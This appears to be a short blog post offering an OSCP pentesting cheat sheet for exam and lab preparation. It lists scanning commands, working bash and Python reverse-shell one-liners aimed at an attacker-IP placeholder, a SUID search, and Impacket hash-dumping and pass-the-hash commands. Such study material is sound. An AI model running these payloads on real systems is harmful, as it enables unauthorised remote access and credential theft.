OSCP Cheat Sheet: The Ultimate Pentesting Resource

If you’re preparing for the OSCP (Offensive Security Certified Professional) or refining your penetration testing skills, this comprehensive cheat sheet is a must-have. It covers essential tools, techniques, and methodologies used in real-world engagements, including:

• Reconnaissance: nmap, ffuf, `Gobuster`
• Web Attacks: SQLi, RCE, XXE, JWT exploitation
• Privilege Escalation: Potato exploits (Hot, Juicy, Rogue)
• Post-Exploitation: BloodHound, Impacket tools
• AV Evasion & Bypass Techniques

You Should Know:

Essential OSCP Commands & Techniques

1. Nmap Scans:

 Basic scan 
nmap -sV -sC -oA scan_results <target_IP>

Aggressive scan (OS detection) 
nmap -A -T4 <target_IP>

UDP scan (slower but crucial) 
nmap -sU -p 53,161 <target_IP> 

2. Web Enumeration with Gobuster:

 Directory brute-forcing 
gobuster dir -u http://<target_IP> -w /usr/share/wordlists/dirb/common.txt

Subdomain enumeration 
gobuster dns -d example.com -w /usr/share/wordlists/subdomains-top1m.txt 

3. Reverse Shells (Common Payloads):

 Bash reverse shell 
bash -i >& /dev/tcp/<attacker_IP>/<port> 0>&1

Python reverse shell 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

4. Privilege Escalation (Linux):

 Check SUID binaries 
find / -perm -4000 2>/dev/null

Kernel exploits 
uname -a  Check kernel version 
searchsploit <kernel_version> 

5. Post-Exploitation with Impacket:

 Dumping hashes 
impacket-secretsdump DOMAIN/user:password@<target_IP>

Pass-the-hash attack 
impacket-psexec -hashes <LM:NTLM_hash> DOMAIN/user@<target_IP> 

What Undercode Say:

The OSCP exam demands hands-on expertise—memorizing commands isn’t enough. Practice in HTB (Hack The Box) or TryHackMe labs. Focus on:
– Manual exploitation (Metasploit is restricted).
– Documentation (report every step).
– Time management (24-hour exam).

Expected Output:

A structured cheat sheet with real-world attack chains, bypass techniques, and exam-compliant methods to maximize efficiency during engagements.

Relevant URLs:

• Offensive Security OSCP
• GTFOBins (SUID Exploits)
• PayloadsAllTheThings (Cheat Sheet)

References:

Reported By: Dharamveer Prasad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram